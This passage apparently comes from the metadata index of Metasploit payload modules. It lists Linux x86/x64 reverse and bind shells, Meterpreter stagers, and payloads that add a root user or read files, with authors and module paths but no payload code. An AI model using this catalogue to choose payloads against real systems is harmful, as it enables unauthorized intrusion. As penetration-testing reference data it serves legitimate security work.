"payload_linux/x64/shell_reverse_ipv6_tcp": { - "name": "Linux x64 Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/linux/x64/shell_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "epi " - ], - "description": "Connect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ricky" - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/adduser": { - "name": "Linux Add User", - "fullname": "payload/linux/x86/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "vlad902 ", - "spoonm " - ], - "description": "Create a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/adduser.rb", - "is_install_path": true, - "ref_name": "linux/x86/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/chmod": { - "name": "Linux Chmod", - "fullname": "payload/linux/x86/chmod", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Runs chmod on specified file with specified mode", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/chmod.rb", - "is_install_path": true, - "ref_name": "linux/x86/chmod", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/x86/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "Geyslan G. Bem " - ], - "description": "Execute an arbitrary command or just a /bin/sh shell", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" - ], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/exec.rb", - "is_install_path": true, - "ref_name": "linux/x86/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/meterpreter/bind_ipv6_tcp": { - "name": "Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/linux/x86/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "kris katterjohn ", - "egypt " - ], - "description": "Inject the mettle server payload (staged).\n\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_linux/x86/meterpreter/bind_ipv6_tcp_uuid": { - "name": "Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Inject the mettle server payload (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_linux/x86/meterpreter/bind_nonx_tcp": { - "name": "Linux Mettle x86, Bind TCP Stager", - "fullname": "payload/linux/x86/meterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape " - ], - "description": "Inject the mettle server payload (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_linux/x86/meterpreter/bind_tcp": { - "name": "Linux Mettle x86, Bind TCP Stager (Linux x86)", - "fullname": "payload/linux/x86/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape ", - "egypt " - ], - "description": "Inject the mettle server payload (staged).\n\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_linux/x86/meterpreter/bind_tcp_uuid": { - "name": "Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/linux/x86/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Inject the mettle server payload (staged).\n\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_linux/x86/meterpreter/find_tag": { - "name": "Linux Mettle x86, Find Tag Stager", - "fullname": "payload/linux/x86/meterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape " - ], - "description": "Inject the mettle server payload (staged).\n\nUse an established connection", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/find_tag.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/find_tag" - }, - "payload_linux/x86/meterpreter/reverse_ipv6_tcp": { - "name": "Linux Mettle x86, Reverse TCP Stager (IPv6)", - "fullname": "payload/linux/x86/meterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "kris katterjohn " - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_linux/x86/meterpreter/reverse_nonx_tcp": { - "name": "Linux Mettle x86, Reverse TCP Stager", - "fullname": "payload/linux/x86/meterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape " - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_linux/x86/meterpreter/reverse_tcp": { - "name": "Linux Mettle x86, Reverse TCP Stager", - "fullname": "payload/linux/x86/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_linux/x86/meterpreter/reverse_tcp_uuid": { - "name": "Linux Mettle x86, Reverse TCP Stager", - "fullname": "payload/linux/x86/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_linux/x86/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/x86/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/x86/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/x86/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/metsvc_bind_tcp": { - "name": "Linux Meterpreter Service, Bind TCP", - "fullname": "payload/linux/x86/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Stub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/metsvc_reverse_tcp": { - "name": "Linux Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/linux/x86/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Stub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/read_file": { - "name": "Linux Read File", - "fullname": "payload/linux/x86/read_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hal" - ], - "description": "Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/read_file.rb", - "is_install_path": true, - "ref_name": "linux/x86/read_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell/bind_ipv6_tcp": { - "name": "Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/linux/x86/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "kris katterjohn ", - "egypt " - ], - "description": "Spawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_linux/x86/shell/bind_ipv6_tcp_uuid": { - "name": "Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/linux/x86/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Spawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_linux/x86/shell/bind_nonx_tcp": { - "name": "Linux Command Shell, Bind TCP Stager", - "fullname": "payload/linux/x86/shell/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_linux/x86/shell/bind_tcp": { - "name": "Linux Command Shell, Bind TCP Stager (Linux x86)", - "fullname": "payload/linux/x86/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "egypt " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_linux/x86/shell/bind_tcp_uuid": { - "name": "Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/linux/x86/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_linux/x86/shell/find_tag": { - "name": "Linux Command Shell, Find Tag Stager", - "fullname": "payload/linux/x86/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/find_tag.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/find_tag" - }, - "payload_linux/x86/shell/reverse_ipv6_tcp": { - "name": "Linux Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/linux/x86/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "kris katterjohn " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_linux/x86/shell/reverse_nonx_tcp": { - "name": "Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/x86/shell/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_linux/x86/shell/reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/x86/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "egypt ", - "tkmru" - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_linux/x86/shell/reverse_tcp_uuid": { - "name": "Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/x86/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_linux/x86/shell_bind_ipv6_tcp": { - "name": "Linux Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/linux/x86/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Listen for a connection over IPv6 and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell_bind_tcp": { - "name": "Linux Command Shell, Bind TCP Inline", - "fullname": "payload/linux/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell_bind_tcp_random_port": { - "name": "Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/linux/x86/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Geyslan G. Bem ", - "Aleh Boitsau " - ], - "description": "Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", - "EDB-41631" - ], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell_find_port": { - "name": 